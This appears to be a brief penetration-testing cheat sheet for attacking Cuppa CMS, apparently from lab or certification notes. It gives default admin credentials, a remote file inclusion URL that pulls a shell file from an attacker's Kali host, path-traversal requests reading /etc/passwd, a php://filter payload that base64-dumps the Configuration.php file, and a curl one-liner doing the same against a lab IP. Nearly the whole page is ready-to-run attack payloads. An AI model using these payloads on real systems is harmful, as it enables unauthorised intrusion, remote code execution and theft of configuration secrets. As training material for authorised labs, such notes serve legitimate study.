Cuppa CMS
Cuppa CMS
http://10.11.1.1/administrator/
Default creds โ admin:admin
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://kaliIP/shelly.txt? #LFI http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd # Path traversal
#Reading /etc/passwd
http://10.11.1.1/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
#Find config files and decode base64 output
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
#Same with curl
curl -s --data-urlencode urlConfig=../../../../../../../etc/passwd http://10.11.1.116/administrator/alerts/alertConfigField.php
Last updated